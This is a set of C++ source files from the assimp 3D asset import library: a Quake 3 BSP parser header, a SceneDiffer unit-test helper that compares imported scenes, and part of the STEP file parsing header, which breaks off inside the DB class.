OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
----------------------------------------------------------------------
*/
#ifndef ASSIMP_Q3BSPFILEPARSER_H_INC
#define ASSIMP_Q3BSPFILEPARSER_H_INC
#include "BaseImporter.h"
#include <string>
namespace Assimp
{
namespace Q3BSP
{
class Q3BSPZipArchive;
struct Q3BSPModel;
class ZipFile;
}
// -------------------------------------------------------------------
// -------------------------------------------------------------------
class Q3BSPFileParser
{
public:
Q3BSPFileParser( const std::string &rMapName, Q3BSP::Q3BSPZipArchive *pZipArchive );
~Q3BSPFileParser();
Q3BSP::Q3BSPModel *getModel() const;
protected:
bool readData(const std::string &rMapName);
bool parseFile();
bool validateFormat();
void getLumps();
void countLumps();
void getVertices();
void getIndices();
void getFaces();
void getTextures();
void getLightMaps();
void getEntities();
private:
size_t m_sOffset;
std::vector<char> m_Data;
Q3BSP::Q3BSPModel *m_pModel;
Q3BSP::Q3BSPZipArchive *m_pZipArchive;
};
} // Namespace Assimp
#endif // ASSIMP_Q3BSPFILEPARSER_H_INC
<|start_filename|>assimp/test/unit/SceneDiffer.cpp<|end_filename|>
/*
---------------------------------------------------------------------------
Open Asset Import Library (assimp)
---------------------------------------------------------------------------
Copyright (c) 2006-2016, assimp team
All rights reserved.
Redistribution and use of this software in source and binary forms,
with or without modification, are permitted provided that the following
conditions are met:
* Redistributions of source code must retain the above
copyright notice, this list of conditions and the
following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the
following disclaimer in the documentation and/or other
materials provided with the distribution.
* Neither the name of the assimp team, nor the names of its
contributors may be used to endorse or promote products
derived from this software without specific prior
written permission of the assimp team.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
---------------------------------------------------------------------------
*/
#include "SceneDiffer.h"
#include <assimp/scene.h>
#include <assimp/mesh.h>
#include <assimp/material.h>
#include <sstream>
namespace Assimp {
SceneDiffer::SceneDiffer()
: m_diffs() {
// empty
}
SceneDiffer::~SceneDiffer() {
// empty
}
bool SceneDiffer::isEqual( const aiScene *expected, const aiScene *toCompare ) {
if ( expected == toCompare ) {
return true;
}
if ( nullptr == expected ) {
return false;
}
if ( nullptr == toCompare ) {
return false;
}
// meshes
if ( expected->mNumMeshes != toCompare->mNumMeshes ) {
std::stringstream stream;
stream << "Number of meshes not equal ( expected: " << expected->mNumMeshes << ", found : " << toCompare->mNumMeshes << " )\n";
addDiff( stream.str() );
return false;
}
for ( unsigned int i = 0; i < expected->mNumMeshes; i++ ) {
aiMesh *expMesh( expected->mMeshes[ i ] );
aiMesh *toCompMesh( toCompare->mMeshes[ i ] );
if ( !compareMesh( expMesh, toCompMesh ) ) {
std::stringstream stream;
stream << "Meshes are not equal, index : " << i << "\n";
addDiff( stream.str() );
}
}
// ToDo!
return true;
// materials
if ( expected->mNumMaterials != toCompare->mNumMaterials ) {
std::stringstream stream;
stream << "Number of materials not equal ( expected: " << expected->mNumMaterials << ", found : " << toCompare->mNumMaterials << " )\n";
addDiff( stream.str() );
return false;
}
if ( expected->mNumMaterials > 0 ) {
if ( nullptr == expected->mMaterials || nullptr == toCompare->mMaterials ) {
addDiff( "Number of materials > 0 and mat pointer is nullptr" );
return false;
}
}
for ( unsigned int i = 0; i < expected->mNumMaterials; i++ ) {
aiMaterial *expectedMat( expected->mMaterials[ i ] );
aiMaterial *toCompareMat( toCompare->mMaterials[ i ] );
if ( !compareMaterial( expectedMat, toCompareMat ) ) {
std::stringstream stream;
stream << "Materials are not equal, index : " << i << "\n";
addDiff( stream.str() );
}
}
return true;
}
void SceneDiffer::showReport() {
if ( m_diffs.empty() ) {
return;
}
for ( std::vector<std::string>::iterator it = m_diffs.begin(); it != m_diffs.end(); it++ ) {
std::cout << *it << "\n";
}
std::cout << std::endl;
}
void SceneDiffer::reset() {
m_diffs.resize( 0 );
}
void SceneDiffer::addDiff( const std::string &diff ) {
if ( diff.empty() ) {
return;
}
m_diffs.push_back( diff );
}
static std::string dumpVector3( const aiVector3D &toDump ) {
std::stringstream stream;
stream << "( " << toDump.x << ", " << toDump.y << ", " << toDump.z << ")";
return stream.str();
}
/*static std::string dumpColor4D( const aiColor4D &toDump ) {
std::stringstream stream;
stream << "( " << toDump.r << ", " << toDump.g << ", " << toDump.b << ", " << toDump.a << ")";
return stream.str();
}*/
static std::string dumpFace( const aiFace &face ) {
std::stringstream stream;
for ( unsigned int i = 0; i < face.mNumIndices; i++ ) {
stream << face.mIndices[ i ];
if ( i < face.mNumIndices - 1 ) {
stream << ", ";
}
else {
stream << "\n";
}
}
return stream.str();
}
bool SceneDiffer::compareMesh( aiMesh *expected, aiMesh *toCompare ) {
if ( expected == toCompare ) {
return true;
}
if ( nullptr == expected || nullptr == toCompare ) {
return false;
}
if ( expected->mName != toCompare->mName ) {
std::stringstream stream;
stream << "Mesh name not equal ( expected: " << expected->mName.C_Str() << ", found : " << toCompare->mName.C_Str() << " )\n";
addDiff( stream.str() );
}
if ( expected->mNumVertices != toCompare->mNumVertices ) {
std::stringstream stream;
stream << "Number of vertices not equal ( expected: " << expected->mNumVertices << ", found : " << toCompare->mNumVertices << " )\n";
addDiff( stream.str() );
return false;
}
// positions
if ( expected->HasPositions() != toCompare->HasPositions() ) {
addDiff( "Expected are vertices, toCompare does not have any." );
return false;
}
bool vertEqual( true );
for ( unsigned int i = 0; i < expected->mNumVertices; i++ ) {
aiVector3D &expVert( expected->mVertices[ i ] );
aiVector3D &toCompVert( toCompare->mVertices[ i ] );
if ( !expVert.Equal( toCompVert ) ) {
std::cout << "index = " << i << dumpVector3( toCompVert ) << "\n";
std::stringstream stream;
stream << "Vertex not equal ( expected: " << dumpVector3( toCompVert ) << ", found: " << dumpVector3( toCompVert ) << "\n";
addDiff( stream.str() );
vertEqual = false;
}
}
if ( !vertEqual ) {
return false;
}
// normals
if ( expected->HasNormals() != toCompare->HasNormals() ) {
addDiff( "Expected are normals, toCompare does not have any." );
return false;
}
// return true;
//ToDo!
/*bool normalEqual( true );
for ( unsigned int i = 0; i < expected->mNumVertices; i++ ) {
aiVector3D &expNormal( expected->mNormals[ i ] );
aiVector3D &toCompNormal( toCompare->mNormals[ i ] );
if ( expNormal.Equal( toCompNormal ) ) {
std::stringstream stream;
stream << "Normal not equal ( expected: " << dumpVector3( expNormal ) << ", found: " << dumpVector3( toCompNormal ) << "\n";
addDiff( stream.str() );
normalEqual = false;
}
}
if ( !normalEqual ) {
return false;
}
// vertex colors
bool vertColEqual( true );
for ( unsigned int a = 0; a < AI_MAX_NUMBER_OF_COLOR_SETS; a++ ) {
if ( expected->HasVertexColors(a) != toCompare->HasVertexColors(a) ) {
addDiff( "Expected are normals, toCompare does not have any." );
return false;
}
for ( unsigned int i = 0; i < expected->mNumVertices; i++ ) {
aiColor4D &expColor4D( expected->mColors[ a ][ i ] );
aiColor4D &toCompColor4D( toCompare->mColors[ a ][ i ] );
if ( expColor4D != toCompColor4D ) {
std::stringstream stream;
stream << "Color4D not equal ( expected: " << dumpColor4D( expColor4D ) << ", found: " << dumpColor4D( toCompColor4D ) << "\n";
addDiff( stream.str() );
vertColEqual = false;
}
}
if ( !vertColEqual ) {
return false;
}
}
// texture coords
bool texCoordsEqual( true );
for ( unsigned int a = 0; a < AI_MAX_NUMBER_OF_TEXTURECOORDS; a++ ) {
if ( expected->HasTextureCoords( a ) != toCompare->HasTextureCoords( a ) ) {
addDiff( "Expected are texture coords, toCompare does not have any." );
return false;
}
for ( unsigned int i = 0; i < expected->mNumVertices; i++ ) {
aiVector3D &expTexCoord( expected->mTextureCoords[ a ][ i ] );
aiVector3D &toCompTexCoord( toCompare->mTextureCoords[ a ][ i ] );
if ( expTexCoord.Equal( toCompTexCoord ) ) {
std::stringstream stream;
stream << "Texture coords not equal ( expected: " << dumpVector3( expTexCoord ) << ", found: " << dumpVector3( toCompTexCoord ) << "\n";
addDiff( stream.str() );
vertColEqual = false;
}
}
if ( !vertColEqual ) {
return false;
}
}
// tangents and bi-tangents
if ( expected->HasTangentsAndBitangents() != toCompare->HasTangentsAndBitangents() ) {
addDiff( "Expected are tangents and bi-tangents, toCompare does not have any." );
return false;
}
bool tangentsEqual( true );
for ( unsigned int i = 0; i < expected->mNumVertices; i++ ) {
aiVector3D &expTangents( expected->mTangents[ i ] );
aiVector3D &toCompTangents( toCompare->mTangents[ i ] );
if ( expTangents.Equal( toCompTangents ) ) {
std::stringstream stream;
stream << "Tangents not equal ( expected: " << dumpVector3( expTangents ) << ", found: " << dumpVector3( toCompTangents ) << "\n";
addDiff( stream.str() );
tangentsEqual = false;
}
aiVector3D &expBiTangents( expected->mBitangents[ i ] );
aiVector3D &toCompBiTangents( toCompare->mBitangents[ i ] );
if ( expBiTangents.Equal( toCompBiTangents ) ) {
std::stringstream stream;
stream << "Tangents not equal ( expected: " << dumpVector3( expBiTangents ) << ", found: " << dumpVector3( toCompBiTangents ) << " )\n";
addDiff( stream.str() );
tangentsEqual = false;
}
}
if ( !tangentsEqual ) {
return false;
}*/
// faces
if ( expected->mNumFaces != toCompare->mNumFaces ) {
std::stringstream stream;
stream << "Number of faces are not equal, ( expected: " << expected->mNumFaces << ", found: " << toCompare->mNumFaces << ")\n";
addDiff( stream.str() );
return false;
}
bool facesEqual( true );
for ( unsigned int i = 0; i < expected->mNumFaces; i++ ) {
aiFace &expFace( expected->mFaces[ i ] );
aiFace &toCompareFace( toCompare->mFaces[ i ] );
if ( !compareFace( &expFace, &toCompareFace ) ) {
addDiff( "Faces are not equal\n" );
addDiff( dumpFace( expFace ) );
addDiff( dumpFace( toCompareFace ) );
facesEqual = false;
}
}
if ( !facesEqual ) {
return false;
}
return true;
}
bool SceneDiffer::compareFace( aiFace *expected, aiFace *toCompare ) {
if ( nullptr == expected ) {
return false;
}
if ( nullptr == toCompare ) {
return false;
}
// same instance
if ( expected == toCompare ) {
return true;
}
// using compare operator
if ( *expected == *toCompare ) {
return true;
}
return false;
}
bool SceneDiffer::compareMaterial( aiMaterial *expected, aiMaterial *toCompare ) {
if ( nullptr == expected ) {
return false;
}
if ( nullptr == toCompare ) {
return false;
}
// same instance
if ( expected == toCompare ) {
return true;
}
// todo!
return true;
}
}
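// ---------------------------------------------------------------------------
// Illustrative usage sketch (not part of the original source). It compares a
// freshly imported scene against an expected one using the class implemented
// above; the Importer usage and the file-path parameters are assumptions made
// for this example only.
#include <assimp/Importer.hpp>

static bool scenesMatchSketch(const char* expectedFile, const char* actualFile)
{
    Assimp::Importer importerExpected, importerActual;
    const aiScene* expected  = importerExpected.ReadFile(expectedFile, 0);
    const aiScene* toCompare = importerActual.ReadFile(actualFile, 0);

    Assimp::SceneDiffer differ;
    const bool equal = differ.isEqual(expected, toCompare);
    if (!equal) {
        differ.showReport(); // prints the collected differences to stdout
    }
    return equal;
}
// ---------------------------------------------------------------------------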
<|start_filename|>assimp/code/STEPFile.h<|end_filename|>
/*
Open Asset Import Library (assimp)
----------------------------------------------------------------------
Copyright (c) 2006-2016, assimp team
All rights reserved.
Redistribution and use of this software in source and binary forms,
with or without modification, are permitted provided that the
following conditions are met:
* Redistributions of source code must retain the above
copyright notice, this list of conditions and the
following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the
following disclaimer in the documentation and/or other
materials provided with the distribution.
* Neither the name of the assimp team, nor the names of its
contributors may be used to endorse or promote products
derived from this software without specific prior
written permission of the assimp team.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
----------------------------------------------------------------------
*/
#ifndef INCLUDED_AI_STEPFILE_H
#define INCLUDED_AI_STEPFILE_H
#include <bitset>
#include <memory>
#include <typeinfo>
#include <vector>
#include <map>
#include <set>
#include "FBXDocument.h" //ObjectMap::value_type
#include <assimp/DefaultLogger.hpp>
//
#if _MSC_VER > 1500 || (defined __GNUC__)
# define ASSIMP_STEP_USE_UNORDERED_MULTIMAP
# else
# define step_unordered_map map
# define step_unordered_multimap multimap
#endif
#ifdef ASSIMP_STEP_USE_UNORDERED_MULTIMAP
# include <unordered_map>
# if _MSC_VER > 1600
# define step_unordered_map unordered_map
# define step_unordered_multimap unordered_multimap
# else
# define step_unordered_map tr1::unordered_map
# define step_unordered_multimap tr1::unordered_multimap
# endif
#endif
#include "LineSplitter.h"
// uncomment this to have the loader evaluate all entities upon loading.
// this is intended as stress test - by default, entities are evaluated
// lazily and therefore not unless needed.
//#define ASSIMP_IFC_TEST
namespace Assimp {
// ********************************************************************************
// before things get complicated, this is the basic outline:
namespace STEP {
namespace EXPRESS {
// base data types known by EXPRESS schemata - any custom data types will derive one of those
class DataType;
class UNSET; /*: public DataType */
class ISDERIVED; /*: public DataType */
// class REAL; /*: public DataType */
class ENUM; /*: public DataType */
// class STRING; /*: public DataType */
// class INTEGER; /*: public DataType */
class ENTITY; /*: public DataType */
class LIST; /*: public DataType */
// class SELECT; /*: public DataType */
// a conversion schema is not exactly an EXPRESS schema, rather it
// is a list of pointers to conversion functions to build up the
// object tree from an input file.
class ConversionSchema;
}
struct HeaderInfo;
class Object;
class LazyObject;
class DB;
typedef Object* (*ConvertObjectProc)(const DB& db, const EXPRESS::LIST& params);
}
// ********************************************************************************
namespace STEP {
// -------------------------------------------------------------------------------
/** Exception class used by the STEP loading & parsing code. It is typically
* coupled with a line number. */
// -------------------------------------------------------------------------------
struct SyntaxError : DeadlyImportError {
enum {
LINE_NOT_SPECIFIED = 0xffffffffffffffffLL
};
SyntaxError (const std::string& s,uint64_t line = LINE_NOT_SPECIFIED);
};
// -------------------------------------------------------------------------------
/** Exception class used by the STEP loading & parsing code when a type
* error (i.e. an entity expects a string but receives a bool) occurs.
* It is typically coupled with both an entity id and a line number.*/
// -------------------------------------------------------------------------------
struct TypeError : DeadlyImportError
{
enum {
ENTITY_NOT_SPECIFIED = 0xffffffffffffffffLL
};
TypeError (const std::string& s,uint64_t entity = ENTITY_NOT_SPECIFIED, uint64_t line = SyntaxError::LINE_NOT_SPECIFIED);
};
// hack to make a given member template-dependent
template <typename T, typename T2>
T2& Couple(T2& in) {
return in;
}
namespace EXPRESS {
// -------------------------------------------------------------------------------
//** Base class for all STEP data types */
// -------------------------------------------------------------------------------
class DataType
{
public:
typedef std::shared_ptr<const DataType> Out;
public:
virtual ~DataType() {
}
public:
template <typename T>
const T& To() const {
return dynamic_cast<const T&>(*this);
}
template <typename T>
T& To() {
return dynamic_cast<T&>(*this);
}
template <typename T>
const T* ToPtr() const {
return dynamic_cast<const T*>(this);
}
template <typename T>
T* ToPtr() {
return dynamic_cast<T*>(this);
}
// utilities to deal with SELECT entities, which currently lack automatic
// conversion support.
template <typename T>
const T& ResolveSelect(const DB& db) const {
return Couple<T>(db).MustGetObject(To<EXPRESS::ENTITY>())->template To<T>();
}
template <typename T>
const T* ResolveSelectPtr(const DB& db) const {
const EXPRESS::ENTITY* e = ToPtr<EXPRESS::ENTITY>();
return e?Couple<T>(db).MustGetObject(*e)->template ToPtr<T>():(const T*)0;
}
public:
/** parse a variable from a string and set 'inout' to the character
* behind the last consumed character. An optional schema enables,
* if specified, automatic conversion of custom data types.
*
* @throw SyntaxError
*/
static std::shared_ptr<const EXPRESS::DataType> Parse(const char*& inout,
uint64_t line = SyntaxError::LINE_NOT_SPECIFIED,
const EXPRESS::ConversionSchema* schema = NULL);
public:
};
typedef DataType SELECT;
typedef DataType LOGICAL;
// -------------------------------------------------------------------------------
/** Sentinel class to represent explicitly unset (optional) fields ($) */
// -------------------------------------------------------------------------------
class UNSET : public DataType
{
public:
private:
};
// -------------------------------------------------------------------------------
/** Sentinel class to represent explicitly derived fields (*) */
// -------------------------------------------------------------------------------
class ISDERIVED : public DataType
{
public:
private:
};
// -------------------------------------------------------------------------------
/** Shared implementation for some of the primitive data type, i.e. int, float */
// -------------------------------------------------------------------------------
template <typename T>
class PrimitiveDataType : public DataType
{
public:
// This is the type that will ultimately be used to
// expose this data type to the user.
typedef T Out;
public:
PrimitiveDataType() {}
PrimitiveDataType(const T& val)
: val(val)
{}
PrimitiveDataType(const PrimitiveDataType& o) {
(*this) = o;
}
public:
operator const T& () const {
return val;
}
PrimitiveDataType& operator=(const PrimitiveDataType& o) {
val = o.val;
return *this;
}
protected:
T val;
};
typedef PrimitiveDataType<int64_t> INTEGER;
typedef PrimitiveDataType<double> REAL;
typedef PrimitiveDataType<double> NUMBER;
typedef PrimitiveDataType<std::string> STRING;
// -------------------------------------------------------------------------------
/** Generic base class for all enumerated types */
// -------------------------------------------------------------------------------
class ENUMERATION : public STRING
{
public:
ENUMERATION (const std::string& val)
: STRING(val)
{}
private:
};
typedef ENUMERATION BOOLEAN;
// -------------------------------------------------------------------------------
/** This is just a reference to an entity/object somewhere else */
// -------------------------------------------------------------------------------
class ENTITY : public PrimitiveDataType<uint64_t>
{
public:
ENTITY(uint64_t val)
: PrimitiveDataType<uint64_t>(val)
{
ai_assert(val!=0);
}
ENTITY()
: PrimitiveDataType<uint64_t>(TypeError::ENTITY_NOT_SPECIFIED)
{
}
private:
};
// -------------------------------------------------------------------------------
/** Wrap any STEP aggregate: LIST, SET, ... */
// -------------------------------------------------------------------------------
class LIST : public DataType
{
public:
// access a particular list index, throw std::range_error for wrong indices
std::shared_ptr<const DataType> operator[] (size_t index) const {
return members[index];
}
size_t GetSize() const {
return members.size();
}
public:
/** @see DataType::Parse */
static std::shared_ptr<const EXPRESS::LIST> Parse(const char*& inout,
uint64_t line = SyntaxError::LINE_NOT_SPECIFIED,
const EXPRESS::ConversionSchema* schema = NULL);
private:
typedef std::vector< std::shared_ptr<const DataType> > MemberList;
MemberList members;
};
// -------------------------------------------------------------------------------
/* Not exactly a full EXPRESS schema but rather a list of conversion functions
* to extract valid C++ objects out of a STEP file. Those conversion functions
* may, however, perform further schema validations. */
// -------------------------------------------------------------------------------
class ConversionSchema
{
public:
struct SchemaEntry {
SchemaEntry(const char* name,ConvertObjectProc func)
: name(name)
, func(func)
{}
const char* name;
ConvertObjectProc func;
};
typedef std::map<std::string,ConvertObjectProc> ConverterMap;
public:
template <size_t N>
explicit ConversionSchema( const SchemaEntry (& schemas)[N]) {
*this = schemas;
}
ConversionSchema() {}
public:
ConvertObjectProc GetConverterProc(const std::string& name) const {
ConverterMap::const_iterator it = converters.find(name);
return it == converters.end() ? NULL : (*it).second;
}
bool IsKnownToken(const std::string& name) const {
return converters.find(name) != converters.end();
}
const char* GetStaticStringForToken(const std::string& token) const {
ConverterMap::const_iterator it = converters.find(token);
return it == converters.end() ? NULL : (*it).first.c_str();
}
template <size_t N>
const ConversionSchema& operator=( const SchemaEntry (& schemas)[N]) {
for(size_t i = 0; i < N; ++i ) {
const SchemaEntry& schema = schemas[i];
converters[schema.name] = schema.func;
}
return *this;
}
private:
ConverterMap converters;
};
}
// ------------------------------------------------------------------------------
/** Bundle all the relevant info from a STEP header, parts of which may later
* be plainly dumped to the logfile, whereas others may help the caller pick an
* appropriate loading strategy.*/
// ------------------------------------------------------------------------------
struct HeaderInfo
{
std::string timestamp;
std::string app;
std::string fileSchema;
};
// ------------------------------------------------------------------------------
/** Base class for all concrete object instances */
// ------------------------------------------------------------------------------
class Object
{
public:
virtual ~Object() {}
Object(const char* classname = "unknown")
: classname(classname) {}
public:
// utilities to simplify casting to concrete types
template <typename T>
const T& To() const {
return dynamic_cast<const T&>(*this);
}
template <typename T>
T& To() {
return dynamic_cast<T&>(*this);
}
template <typename T>
const T* ToPtr() const {
return dynamic_cast<const T*>(this);
}
template <typename T>
T* ToPtr() {
return dynamic_cast<T*>(this);
}
public:
uint64_t GetID() const {
return id;
}
std::string GetClassName() const {
return classname;
}
void SetID(uint64_t newval) {
id = newval;
}
private:
uint64_t id;
const char* const classname;
};
template <typename T>
size_t GenericFill(const STEP::DB& db, const EXPRESS::LIST& params, T* in);
// (intentionally undefined)
// ------------------------------------------------------------------------------
/** CRTP shared base class for use by concrete entity implementation classes */
// ------------------------------------------------------------------------------
template <typename TDerived, size_t arg_count>
struct ObjectHelper : virtual Object
{
ObjectHelper() : aux_is_derived(0) {}
static Object* Construct(const STEP::DB& db, const EXPRESS::LIST& params) {
// make sure we don't leak if Fill() throws an exception
std::unique_ptr<TDerived> impl(new TDerived());
// GenericFill<T> is undefined so we need to have a specialization
const size_t num_args = GenericFill<TDerived>(db,params,&*impl);
(void)num_args;
// the following check is commented because it will always trigger if
// parts of the entities are generated with dummy wrapper code.
// This is currently done to reduce the size of the loader
// code.
//if (num_args != params.GetSize() && impl->GetClassName() != "NotImplemented") {
// DefaultLogger::get()->debug("STEP: not all parameters consumed");
//}
return impl.release();
}
// note that this member always exists multiple times within the hierarchy
// of an individual object, so any access to it must be disambiguated.
std::bitset<arg_count> aux_is_derived;
};
// ------------------------------------------------------------------------------
/** Class template used to represent OPTIONAL data members in the converted schema */
// ------------------------------------------------------------------------------
template <typename T>
struct Maybe
{
Maybe() : have() {}
explicit Maybe(const T& ptr) : ptr(ptr), have(true) {
}
void flag_invalid() {
have = false;
}
void flag_valid() {
have = true;
}
bool operator! () const {
return !have;
}
operator bool() const {
return have;
}
operator const T&() const {
return Get();
}
const T& Get() const {
ai_assert(have);
return ptr;
}
Maybe& operator=(const T& _ptr) {
ptr = _ptr;
have = true;
return *this;
}
private:
template <typename T2> friend struct InternGenericConvert;
operator T&() {
return ptr;
}
T ptr;
bool have;
};
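// ------------------------------------------------------------------------------
/** Illustrative usage sketch (not part of the original header). It shows how an
 *  OPTIONAL member modelled by Maybe<> is typically read; the field meaning and
 *  the fallback value are assumptions made for this example only. */
// ------------------------------------------------------------------------------
inline int64_t GetOptionalOrDefaultSketch(const Maybe<int64_t>& field, int64_t fallback)
{
    // operator!() reports an unset field; Get() asserts on access to an unset
    // value, hence the explicit check before reading it.
    if (!field) {
        return fallback;
    }
    return field.Get();
}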
// ------------------------------------------------------------------------------
/** A LazyObject is created when needed. Before this happens, we just keep
the text line that contains the object definition. */
// -------------------------------------------------------------------------------
class LazyObject
{
friend class DB;
public:
LazyObject(DB& db, uint64_t id, uint64_t line, const char* type,const char* args);
~LazyObject();
public:
Object& operator * () {
if (!obj) {
LazyInit();
ai_assert(obj);
}
return *obj;
}
const Object& operator * () const {
if (!obj) {
LazyInit();
ai_assert(obj);
}
return *obj;
}
template <typename T>
const T& To() const {
return dynamic_cast<const T&>( **this );
}
template <typename T>
T& To() {
return dynamic_cast<T&>( **this );
}
template <typename T>
const T* ToPtr() const {
return dynamic_cast<const T*>( &**this );
}
template <typename T>
T* ToPtr() {
return dynamic_cast<T*>( &**this );
}
Object* operator -> () {
return &**this;
}
const Object* operator -> () const {
return &**this;
}
bool operator== (const std::string& atype) const {
return type == atype;
}
bool operator!= (const std::string& atype) const {
return type != atype;
}
uint64_t GetID() const {
return id;
}
private:
void LazyInit() const;
private:
mutable uint64_t id;
const char* const type;
DB& db;
mutable const char* args;
mutable Object* obj;
};
template <typename T>
inline bool operator==( std::shared_ptr<LazyObject> lo, T whatever ) {
return *lo == whatever; // XXX use std::forward if we have 0x
}
template <typename T>
inline bool operator==( const std::pair<uint64_t, std::shared_ptr<LazyObject> >& lo, T whatever ) {
return *(lo.second) == whatever; // XXX use std::forward if we have 0x
}
// ------------------------------------------------------------------------------
/** Class template used to represent lazily evaluated object references in the converted schema */
// ------------------------------------------------------------------------------
template <typename T>
struct Lazy
{
typedef Lazy Out;
Lazy(const LazyObject* obj = NULL) : obj(obj) {
}
operator const T*() const {
return obj->ToPtr<T>();
}
operator const T&() const {
return obj->To<T>();
}
const T& operator * () const {
return obj->To<T>();
}
const T* operator -> () const {
return &obj->To<T>();
}
const LazyObject* obj;
};
// ------------------------------------------------------------------------------
/** Class template used to represent LIST and SET data members in the converted schema */
// ------------------------------------------------------------------------------
template <typename T, uint64_t min_cnt, uint64_t max_cnt=0uL>
struct ListOf : public std::vector<typename T::Out>
{
typedef typename T::Out OutScalar;
typedef ListOf Out;
ListOf() {
static_assert(min_cnt <= max_cnt || !max_cnt, "min_cnt <= max_cnt || !max_cnt");
}
};
// ------------------------------------------------------------------------------
template <typename TOut>
struct PickBaseType {
typedef EXPRESS::PrimitiveDataType<TOut> Type;
};
template <typename TOut>
struct PickBaseType< Lazy<TOut> > {
typedef EXPRESS::ENTITY Type;
};
template <> struct PickBaseType< std::shared_ptr< const EXPRESS::DataType > >;
// ------------------------------------------------------------------------------
template <typename T>
struct InternGenericConvert {
void operator()(T& out, const std::shared_ptr< const EXPRESS::DataType >& in, const STEP::DB& /*db*/) {
try{
out = dynamic_cast< const typename PickBaseType<T>::Type& > ( *in );
}
catch(std::bad_cast&) {
throw TypeError("type error reading literal field");
}
}
};
template <>
struct InternGenericConvert< std::shared_ptr< const EXPRESS::DataType > > {
void operator()(std::shared_ptr< const EXPRESS::DataType >& out, const std::shared_ptr< const EXPRESS::DataType >& in, const STEP::DB& /*db*/) {
out = in;
}
};
template <typename T>
struct InternGenericConvert< Maybe<T> > {
void operator()(Maybe<T>& out, const std::shared_ptr< const EXPRESS::DataType >& in, const STEP::DB& db) {
GenericConvert((T&)out,in,db);
out.flag_valid();
}
};
template <typename T,uint64_t min_cnt, uint64_t max_cnt>
struct InternGenericConvertList {
void operator()(ListOf<T, min_cnt, max_cnt>& out, const std::shared_ptr< const EXPRESS::DataType >& inp_base, const STEP::DB& db) {
const EXPRESS::LIST* inp = dynamic_cast<const EXPRESS::LIST*>(inp_base.get());
if (!inp) {
throw TypeError("type error reading aggregate");
}
// XXX is this really how the EXPRESS notation ([?:3],[1:3]) is intended?
if (max_cnt && inp->GetSize() > max_cnt) {
DefaultLogger::get()->warn("too many aggregate elements");
}
else if (inp->GetSize() < min_cnt) {
DefaultLogger::get()->warn("too few aggregate elements");
}
out.reserve(inp->GetSize());
for(size_t i = 0; i < inp->GetSize(); ++i) {
out.push_back( typename ListOf<T, min_cnt, max_cnt>::OutScalar() );
try{
GenericConvert(out.back(),(*inp)[i], db);
}
catch(const TypeError& t) {
throw TypeError(t.what() +std::string(" of aggregate"));
}
}
}
};
template <typename T>
struct InternGenericConvert< Lazy<T> > {
void operator()(Lazy<T>& out, const std::shared_ptr< const EXPRESS::DataType >& in_base, const STEP::DB& db) {
const EXPRESS::ENTITY* in = dynamic_cast<const EXPRESS::ENTITY*>(in_base.get());
if (!in) {
throw TypeError("type error reading entity");
}
out = Couple<T>(db).GetObject(*in);
}
};
template <typename T1>
inline void GenericConvert(T1& a, const std::shared_ptr< const EXPRESS::DataType >& b, const STEP::DB& db) {
return InternGenericConvert<T1>()(a,b,db);
}
template <typename T1,uint64_t N1, uint64_t N2>
inline void GenericConvert(ListOf<T1,N1,N2>& a, const std::shared_ptr< const EXPRESS::DataType >& b, const STEP::DB& db) {
return InternGenericConvertList<T1,N1,N2>()(a,b,db);
}
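// Dispatch sketch (illustrative only): GenericConvert selects a specialization of
// InternGenericConvert/InternGenericConvertList based on the *target* type, e.g.
//
//   double d;                       GenericConvert(d, token, db);    // expects EXPRESS::PrimitiveDataType<double>
//   Lazy<SomeEntity> ref;           GenericConvert(ref, token, db);  // expects EXPRESS::ENTITY, resolved through the DB
//   ListOf<Lazy<SomeEntity>,1> l;   GenericConvert(l, token, db);    // expects EXPRESS::LIST, converted element-wise
//
// "SomeEntity" and "token" are placeholders; a TypeError is thrown whenever the
// dynamic_cast onto the expected EXPRESS type fails.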
// ------------------------------------------------------------------------------
/** Lightweight manager class that holds the map of all objects in a
* STEP file. DB's are exclusively maintained by the functions in
* STEPFileReader.h*/
// -------------------------------------------------------------------------------
class DB
{
friend DB* ReadFileHeader(std::shared_ptr<IOStream> stream);
friend void ReadFile(DB& db,const EXPRESS::ConversionSchema& scheme,
const char* const* types_to_track, size_t len,
const char* const* inverse_indices_to_track, size_t len2
);
friend class LazyObject;
public:
